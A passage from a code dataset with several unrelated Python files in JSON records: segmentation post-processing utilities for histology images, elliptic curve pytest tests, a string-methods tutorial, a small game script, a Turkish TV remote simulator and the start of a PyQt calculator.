of classes inculding BG\n Returns\n -------\n encoded_op : one-hot encoded 3D array of shape [H W N] where N=num_class\n\n '''\n num_class = num_class\n \n y_true = tf.cast(y_true, 'int32')\n \n encoded_op = tf.one_hot(y_true, num_class, axis = -1)\n \n if tf.executing_eagerly()==False:\n sess1 = tf.compat.v1.Session()\n encoded_op = sess1.run(encoded_op)\n else: \n encoded_op = encoded_op.numpy()\n return encoded_op\n\ndef seprate_instances(sem_mask, instance_boundaries, num_classes, apply_morph=True, kernel_size=3):\n '''\n\n Parameters\n ----------\n sem_mask : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N]\n instance_boundaries : 2D array of shape [H x W] bounderies for all N classes i.e., [0->BG, 1->boundry]\n num_classes : no of classes in the sem mask including BG an int\n apply_morph : apply morphological operator so that the edges which were chipped of will be recovered\n Returns\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n -------\n op : 3D array containing seperated instances in each channel shape [H x W x N]\n\n '''\n \n # change datatypt to perform operation\n instances = instance_boundaries.astype(np.float16)\n sem_mask = sem_mask.astype(np.float16)\n instances2 = instances * 6 # bc largest value in sem mask is 5\n \n t = np.subtract(sem_mask, instances2)\n negative_remover = lambda a: (np.abs(a)+a)/2 # one line funstion created by lamda 1 input and 1 output\n t = negative_remover(t).astype(np.uint8)\n # or you can use following line\n #t = np.where(t > 0, t, 0).astype(np.uint8)\n \n # Now as in PanNuke dataset the BG was in 5ht channel and during preprocessing we shifted it to \n # 0th channel. Now going back so that 0th channel is Neoplastic class and 5th channel is BG as given \n # in original data description.\n \n if len(np.unique(cv2.fastNlMeansDenoising(t))) == 1:# 1st denoising there might be some noise in the op image\n # if only BG is present than only last channel will be one, do it here\n # b/c the np where conditions wont have any effect on the array if it \n # only have one class\n tt = np.zeros((t.shape[0], t.shape[1], num_classes))\n tt[:,:,5] = tt[:,:,-1] + 1\n t = tt\n else:# if have atleast one nuclie present/ swaping channels again to match GT\n t = np.where(t == 5, 6, t)\n t = np.where(t == 0, 5, t)\n t = np.where(t == 6, 0, t)\n \n t = gray2encoded(t, num_classes)\n \n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size,kernel_size))# before i started main_203 it was 2x2\n op = np.zeros(t.shape)\n for i in range(num_classes):\n # Bc at some place boundry is diagonal and very thin (1px) so measure-label\n # will join two seprate blobs so this will seprate them a little\n t[:,:,i] = cv2.erode(t[:,:,i],kernel,iterations = 1)\n # b/c now 5th channel is BG; still 0 digit represents BG in all channels\n # in 5th channel also the BG of the BG*\n op[:,:,i] = measure.label(t[:,:,i], connectivity=2, background=0)# 2 is ususal\n \n if apply_morph == True:\n #kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(10,10))\n #kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_size, kernel_size))\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n for i in range(num_classes-1):# bc last channel has BG we dont want to change that \n op[:,:,i] = cv2.dilate(op[:,:,i],kernel,iterations = 1)\n \n op[:,:,5] = np.where(op[:,:,5]>1, 1, op[:,:,5])\n \n return op\n\n\n\n\ndef remove_small_obj_n_holes(seg_op, min_area=10, 
kernel_size=3):\n '''\n Parameters\n ----------\n seg_op : a 4D array of N channels [1 H W N] where N is number of classses\n min_area : The smallest allowable object size.\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n Returns\n -------\n a : 4D array of N channels [1 H W N] with noise removed and holes filled\n '''\n seg_op = copy.deepcopy(seg_op).astype(np.uint8)\n #k = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(kernel_size,kernel_size))\n k = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n a = seg_op.squeeze()\n for i in range(a.shape[-1]-1): # iterate over each class seprately\n # need to convert array into boolen type\n b = morphology.remove_small_objects(a[:,:,i+1].astype(bool), min_size=min_area).astype(np.uint8)\n b = cv2.morphologyEx(b, cv2.MORPH_CLOSE, k)\n a[:,:,i+1] = b\n #a[:,:,i+1] = morphology.convex_hull_object(b, connectivity=2)\n #a[:,:,i+1] = binary_fill_holes(b).astype(int)\n a = a[np.newaxis,:,:,:]# keep IO size consistant\n \n return a\n\ndef assgin_via_majority(seg):\n '''\n Parameters\n ----------\n seg : 2D array containing unique pixel values for each class\n Returns\n -------\n x: 2D array where an instance is assigned to be the class of most frequently\n occuring pixel value (as each unique pixel value represent a class).\n '''\n a = copy.deepcopy(seg).astype(np.uint8)\n # 1st convert to binary mask\n _, th = cv2.threshold(a, 0, 1, cv2.THRESH_BINARY)\n # now measure label\n b = measure.label(th, connectivity=2, background=0)\n # now make n unique channels n= no. of labels measured\n c = gray2encoded(b, len(np.unique(b)))\n \n op = np.zeros(c.shape)\n for i in range(len(np.unique(b))-1):\n temp = np.multiply(c[:,:,i+1], a)# multiply each channel element wise\n mfp = most_frequent_pixel(temp)\n # now convert the range form [0, 1] to [0, mfp]\n _, temp = cv2.threshold(temp, 0, mfp, cv2.THRESH_BINARY)\n op[:,:,i+1] = temp\n x = np.sum(op, axis=2)\n \n return x.astype(np.uint8)\n\ndef most_frequent_pixel(img):\n '''\n Parameters\n ----------\n img : 2D array containing unique pixel values for each class\n Returns\n -------\n op : int, most frequently occuring pixel value excluding which has pixel value of 0\n '''\n unq, count = np.unique(img, return_counts=True)\n idx = np.where(count == np.max(count[1:]))\n op = int(unq[idx][0])\n \n return op\n\ndef decode_predictions(seg_op, inst_op, thresh=0.5):\n '''\n Parameters\n ----------\n seg_op : Raw logits from CNN output, shape [B, H, W, N]\n inst_op : Raw logits from CNN output, shape [B, H, W, 1]\n thresh : Threshold on pixel confidence a float between [0, 1]\n Returns\n -------\n seg_op : activated and thresholded output of CNN\n inst_op : activated and thresholded output of CNN\n '''\n seg_op = softmax_activation(seg_op)\n seg_op = (seg_op > thresh).astype(np.uint8)\n seg_op = remove_small_obj_n_holes(seg_op, min_area=22, kernel_size=3)\n seg_op = np.argmax(seg_op[0,:,:,:], 2).astype(np.uint8)\n seg_op = assgin_via_majority(seg_op) # assigning instance via majority pixels ((post processing))\n seg_op = (seg_op).astype(np.uint8)\n \n inst_op = sigmoid_activation(inst_op)\n inst_op = (inst_op > thresh).astype(np.uint8)\n inst_op = inst_op.squeeze()\n inst_op = (inst_op).astype(np.uint8)\n inst_op = bwmorph_thin(inst_op)\n \n return seg_op, inst_op\n\ndef get_inst_seg(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances 
have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB value \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0) # ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1) \n rgb = gray2color(sep_inst.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, rgb)\n else:\n blend = rgb\n \n return blend\n\ndef get_inst_seg_bdr(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0)# ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1)\n # isolate all instances \n sep_inst_enc = gray2encoded(sep_inst, num_class=len(np.unique(sep_inst)))\n # as the in encoded output the 0th channel will be BG we don't need it so\n sep_inst_enc = sep_inst_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sep_inst_enc.shape)\n for i in range(sep_inst_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sep_inst_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n # bc argmax will make the inst at 0 ch zeros so add a dummy channel\n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sep_inst_bdr = np.argmax(temp, axis=-1)\n sep_inst_bdr_rgb = gray2color(sep_inst_bdr.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst_bdr.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, sep_inst_bdr_rgb)\n else:\n blend = sep_inst_bdr_rgb\n \n return blend\n\ndef get_sem(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB color. \n 1. overalyed over original image if; blend=True\n 2. 
Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n seg = gray2color(sem.astype(np.uint8), use_pallet='pannuke')\n \n if blend:\n inv = 1 - cv2.threshold(sem.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, seg)\n else:\n blend = seg\n \n return blend\n\ndef get_sem_bdr(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n # 1-hot encode all classes \n sem_enc = gray2encoded(sem, num_class=6)\n # as the in encoded output the 0th channel will be BG we don't need it so\n sem_enc = sem_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sem_enc.shape)\n for i in range(sem_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sem_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sem_bdr = np.argmax(temp, axis=-1)\n sem_bdr_rgb = gray2color(sem_bdr.astype(np.uint8), use_pallet='pannuke')\n if blend:\n inv = 1 - cv2.threshold(sem_bdr.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, sem_bdr_rgb)\n else:\n blend = sem_bdr_rgb\n return blend\n\ndef my_argmax(tensor):\n '''\n Fixes the zero channel problem i.e. the class predicted at 0th channel \n wont go to 0 as it does with usual np.argmax\n Parameters\n ----------\n pred_tensor : 3D/4D array of shape [B, H, W, N] or [H, W, N]\n Returns\n -------\n argmaxed output of shape [B, H, W] or [H, W]]\n '''\n pred_tensor = np.copy(tensor)\n j = 0\n for i in range(pred_tensor.shape[-1]):\n j = i+1\n pred_tensor[:,:,:,i] = pred_tensor[:,:,:,i] * j\n \n pred_tensor = np.sum(pred_tensor, axis=-1)\n return pred_tensor \n\ndef plot_confusion_matrix(cm, class_names, normalize = True, show_text = True, from_clf = False, my_cmap = 'Greens'):\n '''\n Parameters\n ----------\n cm : a nxn dim numpy array.\n class_names: a list of class names (str type)\n normalize: whether to normalize the values\n show_text: whether to show value in each block of the matrix, If matrix is large like 10x10 or 20x20 it's better to set it to false\n because it'll be difficult to read values but you can see the network behaviour via color map.\n show_fpfn: whether to show false positives on GT axis and false negatives on Pred axis. 
FN -> not detected & FP -> wrong detections\n Returns\n -------\n fig: a plot of confusion matrix along with colorbar\n '''\n if from_clf:\n conf_mat = cm\n x_labels = copy.deepcopy(class_names)\n y_labels = copy.deepcopy(class_names)\n else:\n conf_mat = cm[1:, 1:]\n x_labels = class_names\n y_labels = class_names \n \n c_m = conf_mat\n \n if normalize:\n row_sums = c_m.sum(axis=1)\n c_m = c_m / row_sums[:, np.newaxis]\n c_m = np.round(c_m, 3)\n \n fig, ax = plt.subplots(figsize=(len(class_names)+3, len(class_names)+3))\n im = ax.imshow(c_m, cmap = my_cmap) \n \n # We want to show all ticks...\n ax.set_xticks(np.arange(len(y_labels)))\n ax.set_yticks(np.arange(len(x_labels)))\n # ... and label them with the respective list entries\n ax.set_xticklabels(y_labels)\n ax.set_yticklabels(x_labels)\n \n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")#ha=right\n \n if show_text:\n for i in range(len(x_labels)):\n for j in range(len(y_labels)):\n text = ax.text(j, i, c_m[i, j], color=\"k\", ha=\"center\", va=\"center\")#color=clr_select(i, j)\n \n ax.set_title(\"Normalized Confusion Matrix\")\n fig.tight_layout()\n plt.xlabel('Predicted Labels')\n plt.ylabel('True Labels')\n sm = plt.cm.ScalarMappable(cmap=my_cmap, norm=plt.Normalize(vmin=0, vmax=1))\n sm._A = []\n plt.colorbar(sm)\n plt.show() \n return fig \n\ndef water(img, mask):\n '''\n Parameters\n ----------\n img : 3D array, RGB iamge [H W 3]\n mask : 2D array, semantic/binary segmentaion mask [H W]\n\n Returns\n -------\n img : RGB image wiht overlayd boundry instances\n new : instacnes boundaries\n '''\n img = (img).astype(np.uint8)\n mask = (mask).astype(np.uint8)\n original_image = np.copy(img)\n \n # apply threshold to converto sem-mask to binary mask\n ret, thresh = cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # so that BG pixel have 0 value and FG will have 255 value\n thresh = 255 - thresh\n \n # noise removal\n kernel = np.ones((3,3),np.uint8)\n opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n \n # sure background area\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\n \n # Finding sure foreground area\n dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n # Normalize the distance image for range = {0.0, 1.0}\n # so we can visualize and threshold it \n dist_transform = cv2.normalize(dist_transform, dist_transform, 0, 1.0, cv2.NORM_MINMAX)\n _, sure_fg = cv2.threshold(dist_transform, 0.4, 1.0, cv2.THRESH_BINARY)\n #ret, sure_fg = cv2.threshold(dist_transform, 0.7*dist_transform.max(), 255, 0)\n \n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg,sure_fg)\n \n # Marker labelling\n ret, markers = cv2.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers+1\n # Now, mark the region of unknown with zero\n markers[unknown==255] = 0\n \n # remove bg form the image so that water shed will only focus on cells\n img[thresh==0]=1\n \n markers = markers.astype('int32')\n markers = cv2.watershed(img, markers)\n # draw boundaries on real iamge\n original_image[markers == -1] = [255,0,0]\n # draw boundary on empty convas\n new = np.zeros(img.shape)\n new[markers == -1] = [255, 255, 255]\n new = (new).astype(np.uint8)\n new = cv2.cvtColor(new, cv2.COLOR_BGR2GRAY)\n new = (new/255).astype(np.uint8)\n return original_image, new\n\n\ndef sigmoid_activation(pred):\n pred = tf.convert_to_tensor(pred)\n 
active_preds = tf.keras.activations.sigmoid(pred)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds\n\ndef softmax_activation(pred):\n pred = tf.convert_to_tensor(pred)\n active_preds = tf.keras.activations.softmax(pred, axis=-1)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds","repo_name":"Mr-TalhaIlyas/TSFD","sub_path":"slide_inference/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":26272,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"34099645123","text":"import pytest\nfrom keum import FiniteField, PrimeFiniteField\nfrom keum import (\n babyjubjub,\n secp256k1,\n secp256r1,\n pallas,\n vesta,\n tweedledee,\n tweedledum,\n bn254,\n grumpkin,\n)\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n pallas.ProjectiveWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef Ec(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n pallas.ProjectiveWeierstrass,\n ]\n)\ndef ProjectiveEc(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef AffineEc(request):\n return request.param\n\n\ndef test_affine_random_is_on_the_curve(AffineEc):\n a = AffineEc.random()\n assert AffineEc.is_on_curve(a.x, a.y)\n\n\n# def test_affine_encoding_decoding(AffineEc):\n# a = AffineEc.random()\n# assert AffineEc.of_be_bytes_exn(a.to_be_bytes()) == a\n# assert AffineEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_projective_encoding_decoding(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.of_be_bytes_exn(a.to_be_bytes()) == a\n assert ProjectiveEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_affine_generator_is_on_curve(AffineEc):\n g = AffineEc.generator()\n assert AffineEc.is_on_curve(g.x, g.y)\n\n\ndef test_projective_random_is_on_the_curve(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.is_on_curve(x=a.x, y=a.y, z=a.z)\n\n\ndef test_projective_generator_is_on_curve(ProjectiveEc):\n g = ProjectiveEc.generator()\n assert ProjectiveEc.is_on_curve(x=g.x, y=g.y, z=g.z)\n\n\ndef test_zero_is_identity_for_addition(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a + zero == a\n assert zero + a == a\n\n\ndef test_equality_handles_zero(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a != zero\n assert Ec.zero() == Ec.zero()\n\n\ndef test_negate_identity(Ec):\n assert Ec.zero().negate() == Ec.zero()\n\n\ndef test_negate(Ec):\n a = Ec.random()\n assert a == a.negate().negate()\n\n\ndef test_addition_support_same_points(Ec):\n p = Ec.random()\n assert p + p == p.double()\n\n\ndef test_affine_addition_of_two_points_is_on_the_curve(AffineEc):\n p1 = AffineEc.random()\n p2 = AffineEc.random()\n p = p1 + p2\n assert AffineEc.is_on_curve(x=p.x, y=p.y)\n\n\ndef test_projective_addition_of_two_points_is_on_the_curve(ProjectiveEc):\n p1 = ProjectiveEc.random()\n p2 = 
ProjectiveEc.random()\n p = p1 + p2\n assert ProjectiveEc.is_on_curve(x=p.x, y=p.y, z=p.z)\n\n\ndef test_mul_zero_gives_identity(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(0)) == Ec.zero()\n\n\ndef test_mul_one_gives_same_point(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(1)) == p\n\n\ndef test_mul_by_two_gives_double(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(2)) == p.double()\n\n\ndef test_add_is_commutative(Ec):\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = p1 + p2\n rhs = p2 + p1\n assert lhs == rhs\n\n\ndef test_distributivity_scalar_multiplication(Ec):\n a = Ec.Fr.random()\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = (p1 + p2).mul(a)\n rhs = p1.mul(a) + p2.mul(a)\n assert lhs == rhs\n","repo_name":"dannywillems/py-keum","sub_path":"tests/test_ec.py","file_name":"test_ec.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74874877767","text":"'92'.zfill(5)\n# '00092'\n\n'9123'.zfill(5)\n# '09123'\n\nmsg = 'Hello world!'\nmsg.count('l')\n# 3\n\nmsg.endswith('!')\n# True\n\nmsg.startswith('L')\n# False\n\nmsg.find('w')\n# 7\n\n'hello4'.isdigit()\n# False\n\n'4'.isdigit()\n# True\n\nmsgList = ['hello','world','test']\n\"-\".join(msgList)\n# 'hello-world-test'\n\n\"LOL\".lower()\n# 'lol'\n\n\"lololol\".upper()\n# 'LOLOLOL\n\n'mr Potato'.capitalize()\n# 'Mr Potato'\n\n\"LOL\".isupper()\n# True\n\n'lol'.isupper()\n# False\n\nvegs = 'tomato-potato-carrot'\nvegs.replace('-','=')\n# tomato=potato=carrot\n\nvegs.replace('-','=',1)\n# tomato=potato-carrot\n\ntext = \"I admire you so much\"\ntext.replace(' ','...')\n# 'I...admire...you...so...much'\n\nanimals = \"goats,chickens,ducks,pigs,alpacas\"\nanimals.split(',')\n# ['goats','chickens','ducks','pigs','alpacas']\n\n\"\"\"\nHello\nI\nSee\nYou\"\"\".splitlines()\n# ['','Hello','I','See','You']\n\nuser_input = ' catlady '\nuser_input.strip()\n# 'catlady'\n\nuser_input2 = ' ca t l a dy '\nuser_input2.strip()\n# 'ca t l a dy'\n# doesn't remove the spaces in between the chars","repo_name":"khelyorbek/Learning","sub_path":"18_Python/18_2_Python Data Structures/7_string_methods.py","file_name":"7_string_methods.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41880483578","text":"\"\"\"Defending the earth mother.\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport grimoire\nfrom utils import inventories\n\nP = np.exp(-np.log(2.0)/52.0)\n\"\"\"Cone survival probability per week\"\"\"\n\ndef drop(trans):\n \"\"\"Drops magic cones, maybe.\"\"\"\n spells = list(grimoire.SPELLBOOK.keys())\n nspells = len(spells)\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n if (cones <= 512 and p <= cones / 1024.0) or \\\n (cones > 512 and p <= cones / 2.0**(int(np.log2(cones)) + 2)):\n hist.append({'player': player, 'kind': 'drop', \n 'magic': {spells[np.random.randint(0, nspells)]: 1}})\n\ndef decay(trans):\n \"\"\"Decays cones weekly - you must stay active!\"\"\"\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n # trick to obtain average decay behaviour, even in small samples, \n # without having to roll for each cone individually.\n q, r = divmod(cones*P, 1)\n n = int(q) + int(p <= r)\n if n != cones:\n hist.append({'player': player, 'kind': 'decay', 'cones': 
n - cones})\n \n \n ","repo_name":"pyne/magic-cones","sub_path":"gaia.py","file_name":"gaia.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43931810327","text":"import time\nimport random\nimport msvcrt\n\nclass Kumanda():\n def __init__(self,televizyon_durumu = \"Kapalı\",ses_düzeyi = 0,kanal_listesi = [\"TRT\"],açık_kanal = \"TRT\"):\n print(\"Televizyon oluşturuluyor...\")\n self.televizyon_durumu = televizyon_durumu\n self.ses_düzeyi = ses_düzeyi\n self.kanal_listesi = kanal_listesi\n self.açık_kanal = açık_kanal\n def sesi_düzenle(self):\n while True:\n karakter = input(\"Sesi artırmak için'Arttır'\\nSesi azaltmak için'Azalt'\\nÇıkmak için 'çıkış' yazınız.\\nSeçim:\")\n if (karakter == \"Arttır\"):\n while True:\n x = int(input(\"Arttırmak istediğiniz miktarı giriniz:\\n\"))\n if (x < 0):\n print(\"Böyle bir sayı arttıramazsınız...\")\n elif(x > 0):\n self.ses_düzeyi += x\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"Azalt\"):\n while True:\n y = int(input(\"Azaltmak istediğiniz miktarı giriniz:\\n\"))\n if (y < 0):\n print(\"Böyle bir sayı kadar azaltamazsınız...\")\n elif (y > 0):\n self.ses_düzeyi -= y\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"çıkış\"):\n print(\"Komut alındı\")\n time.sleep(0.5)\n print(\"Çıkış yapılıyor\")\n break\n else:\n print(\"Geçersiz işlem\")\n def tv_kapat(self):\n if (self.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon zaten kapalı....\")\n else:\n print(\"Tv Kapatılıyor...\")\n time.sleep(0.5)\n print(\"Tv kapatıldı...\")\n self.televizyon_durumu = \"Kapalı\"\n def tv_aç(self):\n if (self.televizyon_durumu == \"Açık\"):\n print(\"Televizyon zaten açık...\")\n else:\n print(\"Televizyon açılıyor...\")\n time.sleep(0.5)\n print(\"Televizyon açıldı....\")\n self.televizyon_durumu = \"Açık\"\n def __str__(self):\n return \"TV durumu:{}\\nSes düzeyi:{}\\nKanal Listesi:{}\\nAçık kanal:{}\".format(self.televizyon_durumu,self.ses_düzeyi,self.kanal_listesi,self.açık_kanal)\n def __len__(self):\n return len(self.kanal_listesi)\n def rastgele_kanal(self):\n rastgele = random.randint(0, len(self.kanal_listesi) - 1)\n self.açık_kanal = self.kanal_listesi[rastgele]\n print(\"Şuan açık kanal:\",self.açık_kanal)\n def kanal_ekle(self,kanal):\n print(\"Kanal eklendi:\",kanal)\n self.kanal_listesi.append(kanal)\nkumanda = Kumanda()\nprint(\"\"\"*******************\n\nTelevizyon Uygulaması\n\nİşlemler ;\n\n1. Televizyonu Aç\n\n2. Televizyonu Kapat\n\n3. Televizyon Bilgileri\n\n4. Kanal Sayısını Öğrenme\n\n5. Kanal Ekle\n\n6. Rastgele Kanal'a Geç\n\n7. 
Sesi Düzenle\n\nÇıkmak için 'Çıkış' yazın.\n*******************\"\"\")\nwhile True:\n işlem = input(\"Lütfen gireceğiniz işlemi seçiniz:\")\n if (işlem == \"1\"):\n kumanda.tv_aç()\n elif(işlem == \"2\"):\n kumanda.tv_kapat()\n elif(işlem == \"3\"):\n print(kumanda)\n elif(işlem == \"4\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n print(\"Kanal sayısı :\", len(kumanda))\n elif(işlem == \"5\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kanallar = input(\"Eklemek İstediğiniz Kanalları ',' ile ayırarak girin:\")\n eklenecekler = kanallar.split(\",\")\n for i in eklenecekler:\n kumanda.kanal_ekle(i)\n print(\"Kanal Listesi başarıyla güncellendi...\")\n elif (işlem == \"6\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.rastgele_kanal()\n elif(işlem == \"7\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.sesi_düzenle()\n elif(işlem == \"Çıkış\"):\n print(\"Çıkış yapılıyor...%\",random.randint(0,50))\n time.sleep(1)\n print(\"Çıkış yapılıyor...%\", random.randint(50,99))\n time.sleep(1)\n print(\"Çıkış yapılıyor...½100\")\n time.sleep(1)\n print(\"Çıkış yapıldı...\")\n break\n else:\n print(\"Böyle bir işlem yapamazsınız!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oayk23/python_repository","sub_path":"kumanda.py","file_name":"kumanda.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5102580490","text":"import os\r\nimport sys\r\nimport math\r\nfrom PyQt5 import QtCore, QtGui, uic, QtWidgets\r\nfrom functools import partial\r\n\r\nqtCreatorFile = \"AppGui.ui\"\r\nif os.path.isfile ( qtCreatorFile ):\r\n\t# Use AppGui.ui file for debug\r\n\tUi_MainWindow, QtBaseClass = uic.loadUiType ( qtCreatorFile )\r\nelse:\r\n\t# Use converted AppGui.py file for release\r\n\tfrom AppGui import Ui_MainWindow\r\n\r\n\r\nclass Calculator ( QtWidgets.QMainWindow, Ui_MainWindow ):\r\n\t'''\r\n\tCalculator application.\r\n\t'''\r\n\tdef __init__ ( self ):\r\n\t\tQtWidgets.QMainWindow.__init__ ( self )\r\n\t\tUi_MainWindow.__init__ ( self )\r\n\t\tself.setupUi ( self 